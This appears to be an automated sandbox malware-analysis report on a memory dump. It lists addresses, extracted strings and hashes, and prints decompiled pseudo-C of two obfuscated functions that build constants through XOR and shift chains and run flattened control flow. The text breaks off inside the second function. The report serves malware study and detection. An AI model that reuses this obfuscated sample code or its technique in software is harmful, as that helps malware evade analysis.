0x0104b98e
0x0104b992
0x00000000
0x0104b992
0x0104b98e
0x00000000
0x0104bb1e
0x0104bb1e
0x0104bb20
0x00000000
0x0104bb26
0x0104bb5f
0x0104bb64
0x0104bb67
0x0104bb6b
0x0104bb72
0x0104bb77
0x00000000
0x0104bb77
0x0104bb20
0x0104bb1c
0x0104bb14
0x0104bb08
0x00000000
0x0104bafc
0x0104b99c
0x0104b997

Strings

z|, xrefs: 0104B203
b, xrefs: 0104B8BE
d=`, xrefs: 0104B56D
{, xrefs: 0104B37C
ev6, xrefs: 0104B3A5
GK, xrefs: 0104B173
$, xrefs: 0104B13B
]#,, xrefs: 0104B162
]a, xrefs: 0104B065
Na!, xrefs: 0104B01B
uc, xrefs: 0104B89D
fQq!, xrefs: 0104B945
d=`, xrefs: 0104B58A
]a, xrefs: 0104B6CF
("', xrefs: 0104B2FF
? [, xrefs: 0104AD72
}0, xrefs: 0104B611
fQq!, xrefs: 0104B954

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: ("'$? [$GK$]#,$d=`$d=`$ev6$fQq!$fQq!$uc$z|$$$Na!$]a$]a$b${$}0
API String ID: 0-1223376802
Opcode ID: 89ce51b39008d3ae1143240d0eacdf27811a64a90892f39b83084df15dc231c2
Instruction ID: 858bba83c4e8b372ad4376f1f12a61fe1a4f07f14b6113e5a3d9209e69496600
Opcode Fuzzy Hash: 89ce51b39008d3ae1143240d0eacdf27811a64a90892f39b83084df15dc231c2
Instruction Fuzzy Hash: A682F0B15083818FD3B9CF65C58AA9BBBE1BBD4304F108E1DE5DA96260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 01045AB2, Relevance: 21.8, Strings: 17, Instructions: 590
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E01045AB2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				void* _t621;
				void* _t678;
				void* _t680;
				void* _t682;
				void* _t686;
				void* _t693;
				void* _t695;
				void* _t705;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				void* _t723;
				void* _t741;
				void* _t782;
				signed int _t799;
				void* _t800;
				signed int _t802;
				void* _t803;
				void* _t806;
				signed int* _t808;
				void* _t811;

				_push(0x20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E01062523(_t621);
				_v24 = 0x577da5;
				_t808 =  &(( &_v280)[7]);
				_t806 = 0;
				_t705 = 0x992981b;
				_t802 = 0x46;
				_v24 = _v24 / _t802;
				_v24 = _v24 ^ 0x00013ff7;
				_v112 = 0x11ccad;
				_v112 = _v112 ^ 0x4655cea9;
				_t799 = 0x18;
				_v112 = _v112 / _t799;
				_v112 = _v112 ^ 0x02ed8015;
				_v192 = 0xb3435e;
				_v192 = _v192 ^ 0x5476ca73;
				_v192 = _v192 | 0x86afc529;
				_t711 = 0x41;
				_v192 = _v192 * 0x65;
				_v192 = _v192 ^ 0xcc9bf2c1;
				_v160 = 0xa26fd8;
				_v160 = _v160 | 0x1e457789;
				_v160 = _v160 + 0xffffff9a;
				_v160 = _v160 ^ 0x1ee77f73;
				_v116 = 0x30086e;
				_v116 = _v116 + 0x9b58;
				_v116 = _v116 | 0xa610ad2b;
				_v116 = _v116 ^ 0xa630afef;
				_v132 = 0xc7f8d9;
				_v132 = _v132 / _t711;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x00000c4e;
				_v188 = 0x68adba;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 + 0xdf5e;
				_v188 = _v188 + 0x578c;
				_v188 = _v188 ^ 0x000143ff;
				_v200 = 0xf08783;
				_t712 = 0x34;
				_v200 = _v200 * 0x47;
				_v200 = _v200 * 0x7e;
				_v200 = _v200 << 0xe;
				_v200 = _v200 ^ 0xdff58000;
				_v144 = 0x38ef5c;
				_t78 =  &_v144; // 0x38ef5c
				_v144 =  *_t78 * 0x3a;
				_t80 =  &_v144; // 0x38ef5c
				_v144 =  *_t80 / _t712;
				_v144 = _v144 ^ 0x003f8121;
				_v228 = 0xc2ca7f;
				_v228 = _v228 | 0xbadb225d;
				_v228 = _v228 * 0x34;
				_v228 = _v228 ^ 0xd260086f;
				_v228 = _v228 ^ 0x26cba9a3;
				_v220 = 0xfa4495;
				_v220 = _v220 | 0x88ca2f4f;
				_v220 = _v220 + 0xffff7be1;
				_v220 = _v220 ^ 0xf2c1623b;
				_v220 = _v220 ^ 0x7a3889fb;
				_v176 = 0x22196b;
				_t713 = 0x73;
				_v176 = _v176 * 7;
				_v176 = _v176 >> 7;
				_v176 = _v176 ^ 0x0001dd63;
				_v276 = 0x98ec05;
				_v276 = _v276 >> 0xc;
				_v276 = _v276 * 0x68;
				_v276 = _v276 >> 3;
				_v276 = _v276 ^ 0x00067c57;
				_v68 = 0xae747d;
				_v68 = _v68 | 0x05124624;
				_v68 = _v68 ^ 0x05b231eb;
				_v280 = 0xf8d1c6;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xea15f9b4;
				_v280 = _v280 >> 0xb;
				_v280 = _v280 ^ 0x001d75af;
				_v268 = 0x7023c5;
				_v268 = _v268 * 0x30;
				_v268 = _v268 / _t713;
				_v268 = _v268 << 6;
				_v268 = _v268 ^ 0x0bb4a801;
				_v60 = 0xbac308;
				_v60 = _v60 + 0xffffe338;
				_v60 = _v60 ^ 0x00b6b7d0;
				_v36 = 0xecd648;
				_t714 = 5;
				_v36 = _v36 / _t714;
				_v36 = _v36 ^ 0x00254e20;
				_v260 = 0xd5088a;
				_v260 = _v260 * 0x6a;
				_v260 = _v260 + 0xffff6987;
				_v260 = _v260 * 0x35;
				_v260 = _v260 ^ 0x42f6e70f;
				_v136 = 0xbacd74;
				_v136 = _v136 + 0xffff36ec;
				_v136 = _v136 * 0x60;
				_v136 = _v136 ^ 0x45cdb8fa;
				_v52 = 0xc178d5;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x47c4a061;
				_v184 = 0x5699a9;
				_v184 = _v184 << 0xe;
				_v184 = _v184 >> 1;
				_v184 = _v184 ^ 0x5335f667;
				_v156 = 0x881879;
				_v156 = _v156 + 0xffff87c5;
				_v156 = _v156 >> 0xe;
				_v156 = _v156 ^ 0x00013456;
				_v164 = 0xdfb2f6;
				_v164 = _v164 + 0xffff49bb;
				_v164 = _v164 ^ 0x6eb2aa12;
				_v164 = _v164 ^ 0x6e63c6eb;
				_v168 = 0x3b644e;
				_v168 = _v168 + 0xffff1ea7;
				_v168 = _v168 * 0x2f;
				_v168 = _v168 ^ 0x0ab0038a;
				_v236 = 0x555e72;
				_v236 = _v236 << 5;
				_v236 = _v236 + 0xffffce11;
				_v236 = _v236 >> 2;
				_v236 = _v236 ^ 0x02a9ef11;
				_v244 = 0xb4615f;
				_v244 = _v244 << 8;
				_v244 = _v244 ^ 0xaac634ac;
				_v244 = _v244 >> 9;
				_v244 = _v244 ^ 0x0001a936;
				_v252 = 0x84c56d;
				_v252 = _v252 | 0xe0c7380e;
				_t715 = 0x71;
				_v252 = _v252 * 0x7b;
				_v252 = _v252 / _t715;
				_v252 = _v252 ^ 0x0001e627;
				_v208 = 0x743a3c;
				_v208 = _v208 >> 0x10;
				_v208 = _v208 | 0x81de5d6a;
				_v208 = _v208 / _t802;
				_v208 = _v208 ^ 0x01d76d7e;
				_v44 = 0xfd85af;
				_v44 = _v44 | 0x7ab2340b;
				_v44 = _v44 ^ 0x7af9a8fa;
				_v172 = 0x5349dc;
				_t716 = 0x5c;
				_v172 = _v172 / _t716;
				_v172 = _v172 ^ 0xbfe72ba3;
				_v172 = _v172 ^ 0xbfee364a;
				_v128 = 0x52087a;
				_v128 = _v128 + 0xffffb2ae;
				_v128 = _v128 >> 8;
				_v128 = _v128 ^ 0x000925e5;
				_v248 = 0xc44695;
				_t717 = 0x70;
				_v248 = _v248 * 0x17;
				_v248 = _v248 << 0xd;
				_v248 = _v248 | 0x603c27a6;
				_v248 = _v248 ^ 0x6af21839;
				_v92 = 0x408d93;
				_v92 = _v92 * 0x35;
				_v92 = _v92 + 0xffff7249;
				_v92 = _v92 ^ 0x0d559f7d;
				_v256 = 0xd73509;
				_v256 = _v256 ^ 0x0cacdd47;
				_v256 = _v256 + 0x42fa;
				_v256 = _v256 << 6;
				_v256 = _v256 ^ 0x1f021d73;
				_v224 = 0x764ce4;
				_v224 = _v224 + 0x42fd;
				_v224 = _v224 >> 7;
				_v224 = _v224 + 0xffff86a8;
				_v224 = _v224 ^ 0x0003f000;
				_v264 = 0x8469fa;
				_v264 = _v264 ^ 0xa8d95880;
				_v264 = _v264 + 0xffff86fa;
				_v264 = _v264 << 5;
				_v264 = _v264 ^ 0x0b916974;
				_v216 = 0x2c2bd1;
				_v216 = _v216 + 0xe15a;
				_v216 = _v216 * 5;
				_v216 = _v216 / _t717;
				_v216 = _v216 ^ 0x000677ad;
				_v96 = 0xa27b9c;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0xffffdc19;
				_v96 = _v96 ^ 0xfff1defb;
				_v76 = 0x29665d;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0000f928;
				_v104 = 0x3dd3f8;
				_v104 = _v104 ^ 0x29d7c804;
				_v104 = _v104 + 0xffff0fcf;
				_v104 = _v104 ^ 0x29ec2a6e;
				_v232 = 0xd7cd53;
				_v232 = _v232 + 0xfffff316;
				_v232 = _v232 >> 0xd;
				_t718 = 0x37;
				_v232 = _v232 / _t718;
				_v232 = _v232 ^ 0x00026ebe;
				_v88 = 0x9f762f;
				_v88 = _v88 ^ 0x53088056;
				_v88 = _v88 ^ 0x5398c5d6;
				_v48 = 0x778408;
				_t719 = 0x1a;
				_v48 = _v48 * 0xa;
				_v48 = _v48 ^ 0x04a827e3;
				_v124 = 0xf41155;
				_v124 = _v124 / _t799;
				_v124 = _v124 | 0x4c675d60;
				_v124 = _v124 ^ 0x4c69a558;
				_v56 = 0x52fde7;
				_v56 = _v56 + 0xffffaaf0;
				_v56 = _v56 ^ 0x00584a4f;
				_v196 = 0x1209af;
				_v196 = _v196 + 0xdc05;
				_v196 = _v196 / _t719;
				_v196 = _v196 | 0xd87443c0;
				_v196 = _v196 ^ 0xd871b909;
				_v204 = 0x605434;
				_v204 = _v204 << 7;
				_v204 = _v204 << 0xf;
				_v204 = _v204 | 0x30836e67;
				_v204 = _v204 ^ 0x3d8b23ec;
				_v212 = 0x15d47d;
				_v212 = _v212 ^ 0x7b3a671b;
				_v212 = _v212 | 0xac8ef607;
				_v212 = _v212 + 0x7fea;
				_v212 = _v212 ^ 0xffb55c3c;
				_v140 = 0x9bf75a;
				_v140 = _v140 << 0x10;
				_v140 = _v140 + 0x980c;
				_v140 = _v140 ^ 0xf75cd8ff;
				_v240 = 0xf72558;
				_t720 = 0x54;
				_v240 = _v240 * 0x29;
				_v240 = _v240 << 4;
				_v240 = _v240 | 0x19e98343;
				_v240 = _v240 ^ 0x79e49fd7;
				_v32 = 0xa2f12d;
				_v32 = _v32 * 0x66;
				_v32 = _v32 ^ 0x40e2559c;
				_v120 = 0x74c948;
				_v120 = _v120 / _t720;
				_v120 = _v120 ^ 0x8b74ab3a;
				_v120 = _v120 ^ 0x8b7a945b;
				_t800 = 0xe9dac92;
				_v152 = 0x240c06;
				_t803 = 0xa65db9b;
				_v152 = _v152 ^ 0x96489e26;
				_v152 = _v152 ^ 0x2db1745a;
				_v152 = _v152 ^ 0xbbd649e4;
				_v148 = 0x7dbe27;
				_v148 = _v148 + 0xffffa075;
				_v148 = _v148 + 0x8100;
				_v148 = _v148 ^ 0x0074932c;
				_v84 = 0x6924e8;
				_t721 = 0x16;
				_v84 = _v84 * 3;
				_v84 = _v84 ^ 0x0130d0dd;
				_v28 = 0x7106b;
				_v28 = _v28 + 0xffff4dfa;
				_v28 = _v28 ^ 0x00040a0c;
				_v100 = 0xd5105b;
				_v100 = _v100 << 6;
				_v100 = _v100 + 0xffff04b2;
				_v100 = _v100 ^ 0x35448819;
				_v272 = 0x7ab441;
				_v272 = _v272 / _t721;
				_v272 = _v272 + 0xc85c;
				_v272 = _v272 + 0x5f14;
				_v272 = _v272 ^ 0x000463e3;
				_v64 = 0x232f31;
				_t722 = 0x61;
				_v64 = _v64 / _t722;
				_v64 = _v64 ^ 0x0005b08c;
				_v72 = 0xab1849;
				_v72 = _v72 + 0xffffcb3b;
				_v72 = _v72 ^ 0x00af2a02;
				_v80 = 0x951c37;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x000db97f;
				_v180 = 0x3fe48a;
				_v180 = _v180 + 0xe0fe;
				_v180 = _v180 | 0x43b6596f;
				_v180 = _v180 ^ 0x43f3ab9c;
				_v108 = 0x948ae2;
				_v108 = _v108 ^ 0xfc9d698e;
				_v108 = _v108 ^ 0x8192bcc5;
				_v108 = _v108 ^ 0x7d9d4cd7;
				_v40 = 0x5ab0e0;
				_v40 = _v40 * 0x46;
				_v40 = _v40 ^ 0x18c5c44a;
				while(1) {
					L1:
					_t678 = 0xd5afe1a;
					while(1) {
						L2:
						_t723 = 0x9b1e4fa;
						_t782 = 0x491e516;
						do {
							while(1) {
								L3:
								_t811 = _t705 - 0xa39355c;
								if(_t811 > 0) {
									break;
								}
								if(_t811 == 0) {
									_push(_v280);
									_push(0x1041070);
									_t686 = E01043F5C(_v276, _v68, __eflags);
									_push(_v36);
									_push(0x1041030);
									__eflags = E010554FD(_v260,  &_v16, _t686, _v136, _v52, _v24, _v184, E01043F5C(_v268, _v60, __eflags)) - _v112;
									_t705 =  ==  ? 0x491e516 : 0xbb35261;
									E01060352(_v156, _v164, _t686, _v168);
									E01060352(_v236, _v244, _t687, _v252);
									_t808 =  &(_t808[0xe]);
									_t800 = 0xe9dac92;
									goto L14;
								} else {
									if(_t705 == 0x35fff8c) {
										_t693 = E0106002C(_a12, _v200, _v240, _v32, _v120, _a16, _v20, _v152);
										_t808 =  &(_t808[6]);
										__eflags = _t693 - _v144;
										_t678 = 0xd5afe1a;
										_t705 =  ==  ? 0xd5afe1a : 0x91eac5c;
										goto L2;
									} else {
										if(_t705 == _t782) {
											_push(_v172);
											_t695 = E01043F5C(_v208, _v44, __eflags);
											_t741 = 0x10410a0;
											__eflags = E010555BD( &_v4,  &_v8, _t695, _v128, _t741, _v16, _v248, _v92, _v192, _v256, _v224, _v264) - _v160;
											_t705 =  ==  ? 0x9b1e4fa : _t800;
											E01060352(_v216, _v96, _t695, _v76);
											_t808 =  &(_t808[0xc]);
											L14:
											_t803 = 0xa65db9b;
											L28:
											_t678 = 0xd5afe1a;
											_t723 = 0x9b1e4fa;
											_t782 = 0x491e516;
											goto L29;
										} else {
											if(_t705 == 0x91eac5c) {
												E010518C8(_v100, _v272, _v20);
												_t705 = 0xc82d562;
												while(1) {
													L1:
													_t678 = 0xd5afe1a;
													goto L2;
												}
											} else {
												if(_t705 == 0x992981b) {
													_t705 = 0xa39355c;
													continue;
												} else {
													if(_t705 != _t723) {
														goto L29;
													} else {
														_push(_t723);
														_v12 = E0104F38A(_v8);
														_t705 =  !=  ? _t803 : _t800;
														while(1) {
															L1:
															_t678 = 0xd5afe1a;
															L2:
															_t723 = 0x9b1e4fa;
															_t782 = 0x491e516;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L22:
								return _t806;
							}
							__eflags = _t705 - _t803;
							if(_t705 == _t803) {
								_t680 = E01053B54(_v8, _v48, _v12, _v116, _v16, _v124, _t723,  &_v20, _v56, _v132, _v196, _v204, _v212, _v140);
								_t808 =  &(_t808[0xc]);
								__eflags = _t680 - _v188;
								if(__eflags != 0) {
									_t705 = 0xc82d562;
									goto L28;
								} else {
									_t705 = 0x35fff8c;
									goto L1;
								}
							} else {
								__eflags = _t705 - 0xc82d562;
								if(_t705 == 0xc82d562) {
									E01042043(_v12, _v64, _v72, _v80);
									_t705 = _t800;
									while(1) {
										L1:
										_t678 = 0xd5afe1a;
										goto L2;
									}
								} else {
									__eflags = _t705 - _t678;
									if(_t705 == _t678) {
										_t682 = E01053802(_v148, _v84, _v20, _v28, 0x20, _a8, _v228);
										_t808 =  &(_t808[5]);
										_t705 = 0x91eac5c;
										__eflags = _t682 - _v220;
										_t806 =  ==  ? 1 : _t806;
										while(1) {
											L1:
											_t678 = 0xd5afe1a;
											goto L2;
										}
									} else {
										__eflags = _t705 - _t800;
										if(_t705 != _t800) {
											goto L29;
										} else {
											E01042153(_v176, _v180, _v108, _v16, _v40);
										}
									}
								}
							}
							goto L22;
							L29:
							__eflags = _t705 - 0xbb35261;
						} while (__eflags != 0);
						goto L22;
					}
				}
			}

0x01045abc
0x01045abe
0x01045ac5
0x01045acc
0x01045ad3
0x01045ada
0x01045adb
0x01045adc
0x01045ae1
0x01045aec
0x01045af8
0x01045afa
0x01045b01
0x01045b06
0x01045b0f
0x01045b1a
0x01045b25
0x01045b37
0x01045b3c
0x01045b45
0x01045b50
0x01045b58
0x01045b60
0x01045b6d
0x01045b70
0x01045b74
0x01045b7c
0x01045b87
0x01045b92
0x01045b9a
0x01045ba5
0x01045bb0
0x01045bbb
0x01045bc6
0x01045bd1
0x01045be7
0x01045bee
0x01045bf6
0x01045c01
0x01045c09
0x01045c0e
0x01045c16
0x01045c1e
0x01045c26
0x01045c33
0x01045c34
0x01045c3d
0x01045c41
0x01045c46
0x01045c4e
0x01045c59
0x01045c61
0x01045c68
0x01045c71
0x01045c78
0x01045c83
0x01045c8b
0x01045c98
0x01045c9c
0x01045ca6
0x01045cae
0x01045cb6
0x01045cbe
0x01045cc6
0x01045cce
0x01045cd6
0x01045ce5
0x01045ce8
0x01045cec
0x01045cf1
0x01045cf9
0x01045d01
0x01045d0b
0x01045d0f
0x01045d14
0x01045d1c
0x01045d27
0x01045d32
0x01045d3d
0x01045d4a
0x01045d4e
0x01045d56
0x01045d5b
0x01045d63
0x01045d70
0x01045d7c
0x01045d80
0x01045d85
0x01045d8d
0x01045d98
0x01045da3
0x01045dae
0x01045dc0
0x01045dc3
0x01045dca
0x01045dd5
0x01045de2
0x01045de6
0x01045df3
0x01045df7
0x01045dff
0x01045e0a
0x01045e1d
0x01045e24
0x01045e2f
0x01045e42
0x01045e49
0x01045e54
0x01045e5c
0x01045e61
0x01045e65
0x01045e6d
0x01045e78
0x01045e83
0x01045e8b
0x01045e96
0x01045ea1
0x01045eac
0x01045eb7
0x01045ec2
0x01045ecd
0x01045ee0
0x01045ee7
0x01045ef4
0x01045efc
0x01045f01
0x01045f09
0x01045f0e
0x01045f16
0x01045f1e
0x01045f23
0x01045f2b
0x01045f30
0x01045f38
0x01045f40
0x01045f4f
0x01045f52
0x01045f5e
0x01045f62
0x01045f6a
0x01045f72
0x01045f77
0x01045f87
0x01045f8b
0x01045f93
0x01045f9e
0x01045fa9
0x01045fb4
0x01045fc6
0x01045fcb
0x01045fd4
0x01045fdf
0x01045fea
0x01045ff5
0x01046000
0x01046008
0x01046013
0x01046020
0x01046021
0x01046025
0x0104602a
0x01046032
0x0104603a
0x0104604d
0x01046054
0x0104605f
0x0104606a
0x01046072
0x0104607a
0x01046082
0x01046087
0x0104608f
0x01046097
0x0104609f
0x010460a4
0x010460ac
0x010460b4
0x010460bc
0x010460c4
0x010460cc
0x010460d1
0x010460d9
0x010460e1
0x010460ee
0x010460f8
0x010460fe
0x01046106
0x01046111
0x01046119
0x01046124
0x0104612f
0x0104613a
0x01046142
0x0104614d
0x01046158
0x01046163
0x0104616e
0x01046179
0x01046181
0x01046189
0x01046194
0x01046199
0x0104619d
0x010461a5
0x010461b0
0x010461bb
0x010461c6
0x010461db
0x010461de
0x010461e5
0x010461f0
0x01046206
0x0104620d
0x01046218
0x01046223
0x0104622e
0x01046239
0x01046244
0x0104624c
0x0104625c
0x01046260
0x01046268
0x01046270
0x01046278
0x0104627d
0x01046282
0x0104628a
0x01046292
0x0104629a
0x010462a2
0x010462aa
0x010462b2
0x010462ba
0x010462c5
0x010462cd
0x010462d8
0x010462e3
0x010462f0
0x010462f1
0x010462f5
0x010462fa
0x01046302
0x0104630a
0x0104631d
0x01046324
0x0104632f
0x01046343
0x0104634a
0x01046357
0x01046362
0x01046367
0x01046372
0x01046377
0x01046382
0x0104638d
0x01046398
0x010463a3
0x010463ae
0x010463b9
0x010463c4
0x010463d9
0x010463dc
0x010463e3
0x010463ee
0x010463f9
0x01046404
0x0104640f
0x0104641a
0x01046422
0x0104642d
0x01046438
0x01046448
0x0104644c
0x01046454
0x0104645c
0x01046464
0x01046476
0x01046479
0x01046480
0x0104648b
0x01046496
0x010464a1
0x010464ac
0x010464b7
0x010464bf
0x010464ca
0x010464d2
0x010464da
0x010464e2
0x010464ea
0x010464f5
0x01046500
0x0104650b
0x01046516
0x01046529
0x01046530
0x0104653b
0x0104653b
0x0104653b
0x01046540
0x01046540
0x01046540
0x01046545
0x0104654a
0x0104654a
0x0104654a
0x0104654a
0x01046550
0x00000000
0x00000000
0x01046556
0x010466ca
0x010466d9
0x010466de
0x010466e3
0x010466f7
0x0104673f
0x0104675b
0x0104675f
0x01046771
0x01046776
0x01046779
0x00000000
0x0104655c
0x01046562
0x010466a5
0x010466ac
0x010466bb
0x010466bd
0x010466c2
0x00000000
0x01046568
0x0104656a
0x010465de
0x010465f2
0x010465f8
0x01046644
0x0104665d
0x01046661
0x01046666
0x01046669
0x01046669
0x010468bf
0x010468bf
0x010468c4
0x010468c9
0x00000000
0x0104656c
0x01046572
0x010465ce
0x010465d4
0x0104653b
0x0104653b
0x0104653b
0x00000000
0x0104653b
0x01046574
0x0104657a
0x010465b5
0x00000000
0x0104657c
0x0104657e
0x00000000
0x01046584
0x01046596
0x010465a5
0x010465b0
0x0104653b
0x0104653b
0x0104653b
0x01046540
0x01046540
0x01046545
0x00000000
0x01046545
0x0104653b
0x0104657e
0x0104657a
0x01046572
0x0104656a
0x01046562
0x010467d0
0x010467da
0x010467da
0x01046783
0x01046785
0x010468a2
0x010468a7
0x010468aa
0x010468ae
0x010468ba
0x00000000
0x010468b0
0x010468b0
0x00000000
0x010468b0
0x0104678b
0x0104678b
0x01046791
0x01046840
0x01046847
0x0104653b
0x0104653b
0x0104653b
0x00000000
0x0104653b
0x01046797
0x01046797
0x01046799
0x01046804
0x01046812
0x01046815
0x0104681a
0x0104681c
0x0104653b
0x0104653b
0x0104653b
0x00000000
0x0104653b
0x0104679b
0x0104679b
0x0104679d
0x00000000
0x010467a3
0x010467c6
0x010467cb
0x0104679d
0x01046799
0x01046791
0x00000000
0x010468ce
0x010468ce
0x010468ce
0x00000000
0x010468da
0x01046540

Strings

Nd;, xrefs: 01045EC2
\59, xrefs: 010465B5
Z, xrefs: 010460E1
r^U, xrefs: 01045EF4
Lv, xrefs: 0104608F
$i, xrefs: 010463C4
N%, xrefs: 01045DCA
\59, xrefs: 0104654A
1/#, xrefs: 01046464
n*), xrefs: 0104616E
%, xrefs: 01046008
\8, xrefs: 01045C59
OJX, xrefs: 01046239
]f), xrefs: 0104612F
4T`, xrefs: 01046270
<:t, xrefs: 01045F6A
`]gL, xrefs: 0104620D

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID: N%$1/#$4T`$<:t$Nd;$OJX$Z$\59$\59$\8$]f)$`]gL$n*)$r^U$$i$%$Lv
API String ID: 0-3581384141
Opcode ID: 90912a7ea98224fef62cf683911dafedc2ec23615d1b95cfb910dc1f85f5a08c
Instruction ID: 42715fabb49a52de8cd12a08172ecd7de3ce59d70791bf50078a7ddd989ce597
Opcode Fuzzy Hash: 90912a7ea98224fef62cf683911dafedc2ec23615d1b95cfb910dc1f85f5a08c
Instruction Fuzzy Hash: 1F62FFB15083819BD3B8CF25C58AB8FBBE2BBD5304F108A1DE5DA86260D7B19549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 01057ED1, Relevance: 20.7, Strings: 16, Instructions: 706
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E01057ED1(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr* _v96;
				char _v100;
				void _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t812;
				void* _t816;
				void* _t819;
				void* _t827;
				void* _t831;
				void* _t839;
				void* _t846;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				void* _t877;
				void* _t939;
				intOrPtr* _t959;
				signed int _t961;
				void* _t962;
				intOrPtr _t966;
				void* _t967;
				void* _t971;

				_t959 = __ecx;
				_v96 = __ecx;
				_v88 = 0x4b308c;
				_v84 = 0x68a357;
				_t966 = 0;
				_v80 = 0;
				_t846 = 0x5095c78;
				_v380 = 0x65a42d;
				_v380 = _v380 >> 5;
				_t853 = 0x2a;
				_v380 = _v380 / _t853;
				_v380 = _v380 << 0xc;
				_v380 = _v380 ^ 0x0135c000;
				_v348 = 0xa5d38e;
				_v348 = _v348 + 0xb9c5;
				_v348 = _v348 << 0xb;
				_t961 = 9;
				_v348 = _v348 * 0x52;
				_v348 = _v348 ^ 0xca24b000;
				_v140 = 0x8d3f77;
				_v140 = _v140 ^ 0x151b0181;
				_v140 = _v140 ^ 0x15963ef6;
				_v400 = 0x207a6e;
				_v400 = _v400 << 5;
				_v400 = _v400 << 8;
				_v400 = _v400 ^ 0x8b464bbd;
				_v400 = _v400 ^ 0x840b8bbd;
				_v312 = 0x1fa3da;
				_v312 = _v312 + 0x3108;
				_v312 = _v312 * 0x36;
				_v312 = _v312 ^ 0x06b6e7ac;
				_v276 = 0x748fc6;
				_v276 = _v276 + 0xffffe429;
				_v276 = _v276 | 0xa76916e4;
				_v276 = _v276 ^ 0xa77d77ef;
				_v340 = 0x455dfa;
				_v340 = _v340 ^ 0xe88bfa17;
				_v340 = _v340 + 0xffff2853;
				_v340 = _v340 ^ 0xe8cdd040;
				_v304 = 0xe2385b;
				_v304 = _v304 + 0xf051;
				_v304 = _v304 ^ 0x6c6e5fff;
				_v304 = _v304 ^ 0x6c8d7753;
				_v248 = 0xbb5b14;
				_v248 = _v248 | 0xf3fbf98f;
				_v248 = _v248 ^ 0xf3fbfb9f;
				_v368 = 0x2d4fd6;
				_v368 = _v368 ^ 0xbe47ef6a;
				_v368 = _v368 | 0x228e4a2b;
				_v368 = _v368 >> 0xf;
				_v368 = _v368 ^ 0x00017ddd;
				_v356 = 0x878a0;
				_v356 = _v356 ^ 0xc7db0bb3;
				_v356 = _v356 / _t961;
				_v356 = _v356 ^ 0x93ef2515;
